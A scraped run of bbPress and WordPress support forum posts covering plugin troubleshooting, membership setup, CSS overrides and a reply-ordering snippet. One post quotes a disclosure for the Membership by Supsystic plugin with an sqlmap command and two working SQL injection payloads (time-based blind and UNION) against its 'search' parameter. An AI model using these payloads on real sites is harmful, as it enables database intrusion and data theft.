Hello again?
@robin-w
I thought of this problem as “bbp style pack”
Because when a problem occurs, the error is “bbp style pack” error.
this support link
I just updated the bbp style pack, but bbpress still problems
I don’t think it’s a “bbp style pack” problem
(Because no error occurs after update)
I’m worried because no error occurred
First, I’ll try to disable the plugin one by one according to your guide and test it.
I will also install the “Health Check & Troubleshooting” plugin.
Thanks
Best Regards,
Hyunho
works fine on my test site – I can only suggest it could be a theme or plugin issue
Themes
As a test switch to a default theme such as twentytwenty, and see if this fixes.
Plugins
If that doesn’t work, also deactivate all plugins apart from bbpress and see if this fixes. if it does, re-enable one at a time to see which is causing the error.
If you cannot do this to your site (say because it is live) then use the ‘troubleshooting’ features of this plugin to let you test without affecting other users
Health Check & Troubleshooting
Then come back
if you’re happy using bbpress templates, then grab the version from my style pack plugin
bbp style pack
it is in
plugins\bbp-style-pack\trunk\templates\templates1\loop-forums.php
it should work if you just copy it to your child theme’s bbpress folder.
Alternately you can just use the plugin and once activated go to
dashboard>settings>bbp style pack>forum templates
If you are happy to have a hands on approach to user registrations, then you probably don’t need a membership plugin.
As far as the bbpress part goes
forums set to public are viewable by anyone
forums set to private are viewable only by registered users
so if you set forums to private they will not appear to unregistered users, so only visible once a user has logged in. If you set not to allow anonymous posting (dashboard>settings>forums) , then only registered users will be able to post.
bbpress just uses wordpress users for login and registration with an extra bbpress parameter, so you can just use wordpress to set up users.
If you are going to have manual registration, then you turn off ‘anyone can register’ in wordpress (dashboard>settings>general>membership), and create a form using a form plugin (eg contact form 7) to let users ask to register with whatever fields you want. This will be emailed to whoever you want, who can then decide if they should allow membership.
You can then take payment manually (eg bank transfer) or via say a Paypal link on your site.
The approver would then add the user (2 minutes or less).
As far as wordpress page content then use a plugin that restricts content to registered users such as
Content Control – User Access Restriction Plugin
finally you would use
bbPress Messages
to allow uses to message each other – don’t worry that this plugin has not been updated for a while – it is stable and works
as far as I can see that would meet your requirements list.
The Plugin was (luckily) not installed. We just decided to use it, then we saw that wordpress has taken it down on their Plugin Site.
The exploit seems to be an SQL Injection.
# 1. Description
The GET parameters “search” and “sidx” does not sanitize user input when searching for badges.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
Referer: http://192.168.0.63/wp-admin/admin.php?page=supsystic-membership&module=badges&action=index
sqlmap -r request.txt –dbms=mysql -p search
Parameter: search (GET)
Type: time-based blind
Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s’ AND (SELECT 8958 FROM (SELECT(SLEEP(5)))oBIL) AND ‘trjK’=’trjK&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc
Type: UNION query
Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s’ UNION ALL SELECT NULL,CONCAT(0x71786a6b71,0x6569796370704c625352574e6e424874456a74457847635473525a466d47576f775a46446b4e7055,0x716a7a6a71),NULL,NULL– -&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc
Hi
upgrade to wordpress 5.6.1 and php 8.0.2
I wrote a new topic
When writing is completed, the following abnormal screen is displayed.
ref img1 : https://ibb.co/DbDR2vT
ref img2 : https://ibb.co/M53Lwgb
Seriously, nothing is left in nginx’s error log.
Nothing is left in the error log of php-fpm.
The topics created before the upgrade can be read normally.
This problem arises from topics created after the upgrade.
i need to help
Best Regards,
Hyunho
I wanted to create a membership site with: Membership by Supsystic and integrate bbPress for the forum part.
But this has been exploited on February 8th, so it’s no longer an option.
We wanted that:
– members can interact with each other
– the forum is only for registered members
– members need approval for registration (they have to pay first)
– some wordpress pages are only for registrated members
– all other wordpress pages are visible for everyone
All of this was achievable with the Members by Supsystic Plugin + the paid extension to limit some pages only for members.
Is there any alternative that works with bbPress? Our forum already uses bbPress and we wanted to keep it that way.
Thank you very much for any help!
This is our actual membership page on our website (idk if you need it): https://nestli-seminare.de/netzwerk/login-bereich/
Thanks!
Nicklas
I just test, it worked on my new testing:
WordPress version: 5.5.3
WooCommerce version: 4.4.1
On WP 5.5.3, It could call to bsp_test_email function ( includes/functions_email.php)
On WP 5.6, It could not call to bsp_test_email function ( includes/functions_email.php)
bbp style pack
once activated go to
dashboard>settings>bbp style pack>shortcodes
hmmm…can only suggest that you try the basic fault finding….
Themes
As a test switch to a default theme such as twentytwenty, and see if this fixes.
Plugins
If that doesn’t work, also deactivate all plugins apart from bbpress and see if this fixes. if it does, re-enable one at a time to see which is causing the error.
If you cannot do this to your site (say because it is live) then use the ‘troubleshooting’ features of this plugin to let you test without affecting other users
Health Check & Troubleshooting
This is the plugin for using shortcodes in menu – hope this helps ?
Shortcode in Menus
Put this in your child theme’s function file –
ie wp-content/themes/%your-theme-name%/functions.php
where %your-theme-name% is the name of your theme
or use
Code Snippets
function change_reply_order() {
$args['order'] = 'DESC';
return $args;
}
add_filter('bbp_before_has_replies_parse_args', 'change_reply_order');
Hi,
I am having issues overriding the css in bbpress.min.css using my child theme style.css
I have also tried the method of creating a bbpress.css in the wp-content\themes\<child-theme>\css\ folder, but that hasnt worked.
Using a parent theme and making changes in that style.css seems to work (albeit my dev server has on an older version of wordpress).
Specifically, I am trying to change the sizes of “topic type” and “topic status” dropdowns (or the font) as the text is cut off.
I’m targeting the ID #bbp_topic_status_select directly with !important and still not working.
WP version: 5.6.1
bbpress version: 2.6.6
URL: tinymatch.com.au/forums/forum/general/
In our wordpress site, our post page is set to Blog in the Homepage settings. We have recently installed bbPress and are setting have set up a forum page with the header “Community Forum”. This correctly displays the bbPress forum tree. However, when you navigate to a forum in the structure, you are directed to the Blog page which then display the forum. This is a problem because the page headers are different. We can’t figure out why this is happening or how to correct it. Any help or tips would be greatly appreciated.
I *think* I’m seeing an issue with bbPress (2.6.6) on WP 5.6.1. I’ve only seen it on mobile devices. What happens is that when you start editing a post in text mode there is no echo. If you switch to visual and back to text, the text appears. I’m wondering is this is related to the recently reported bug(s) in WP 5.6.1 involving TinyMCE or editing in general.
Anybody know any more about this, or has anyone else seen a problem with mobile device text posting on WP 5.6.1?
@ricsca2 – I’m pretty sure it just uses the wordpress default excerpt length, which you can amend – see this for 3 methods
How to Change The Default Excerpt Length In WordPress
if this works, please post back so we know 🙂
which field do you mean? – bbpress doesn’t store anything google+ related, in fact bbpress doesn’t store any social media fields at all – WordPress does, and it might also be your theme or another plugin adding these
Hi
I use wordpress + bbpress
For example, i need to write a query statement(mysql) on a topic.
ex)
select
id,
numberfrom tab
When an grave accent is entered, the [code] tag is automatically inserted.
ref img : https://ibb.co/9bhG177
I want it to be typed exactly as you type it.
So I want to disable the function for the code tag.
I need your help and support
Best Regards,
Hyunho
it could be a theme or plugin issue
Themes
As a test switch to a default theme such as twentytwenty, and see if this fixes.
Plugins
If that doesn’t work, also deactivate all plugins apart from bbpress and see if this fixes. if it does, re-enable one at a time to see which is causing the error.
If you cannot do this to your site (say because it is live) then use the ‘troubleshooting’ features of this plugin to let you test without affecting other users
Health Check & Troubleshooting
Then come back
@newest- ok, thanks for that.
It works the other way around, you add a topic to a post, not a post to a topic.
so when you publish or edit a wordpress post, you can attach a topic to it.
I didn’t write the original plugin, and Gutenberg made it not work, so I have been given editing rights to try and fix it.
so start by going to
dashboard>settings>discussion and you will see topics for posts about half way down – here you can set up the default actions.
Then as a test create a post.
on the right hand side you should see Post and Block options, make sure you have clicked Post
You should then see near the bottom either in the main but or in the sidebar a ‘Topics for Posts’ box, which will show the defaults.
If you don’t see this (as Gutenberg unhelpfully tries to hide anything useful to the user) click the 3 vertical dots on the right hand side right of publish and the settings cog, at the bottom you will find ‘preferences’ and in that you will find the option to show the topics for posts under additional panels section at the bottom
Sorry this is all horrible – it’s not me making it so I promise you 🙂
@robin-w
I was not able to attach an image describing the issue I am facing , hence asking for same. I have managed that finally and the image is attached in thereply.
The description of this plugin reads :
===
Adds an option to the Discussion meta box to use a bbPress topic instead of WordPress comments, and displays that topic beneath the post on your site.
You can let the plugin create a new topic for you in the forum of your choice, or specify an existing topic to attach to the post.
A topic can be attached to as many posts as you’d like, but only one topic can currently be attached to a post.
====
From above my understanding is that in Discussion Metabox of a post a bbPress topic should show up, or I should be able to create a new topic. But that is not happening, though I am getting a checkbox that I have already ticked in, as shown in image I have attached.
You say :
“Topics for posts works on when you publish a topic, so can you start there.”
But when publishing a topic I see no option to attach it to an existing post. Please see image under :

——
I hope I am able to clarify. I can appreciate you have limited time. If still too cumbersome or still not clear, let us forget about this. Thanks anyways.
I think I got timed out, not sure if my reply was deleted.
I haven’t solved it yet, I did find two promising threads though but I couldn’t make sense of it.
ok, if you have no keymaster, then install
bbp style pack
once activated go to
dashboard>settings>bbp style pack>bug fixes
and you will be able to set a keymaster, who can then see forums
you can deactivate and delete the style pack plugin afterwards, or make use of its features
i have installed bbpress , i am an administrator , i assigned the role to user moderator (the highest show role) i can only see topic and replies tab only on my WordPress dashboard
i saw other support queries tried every thing but cant fix it
i set permanlinks also
cant assign keymaster as its not visible in option
https://www.theislamicquotes.com/ is the site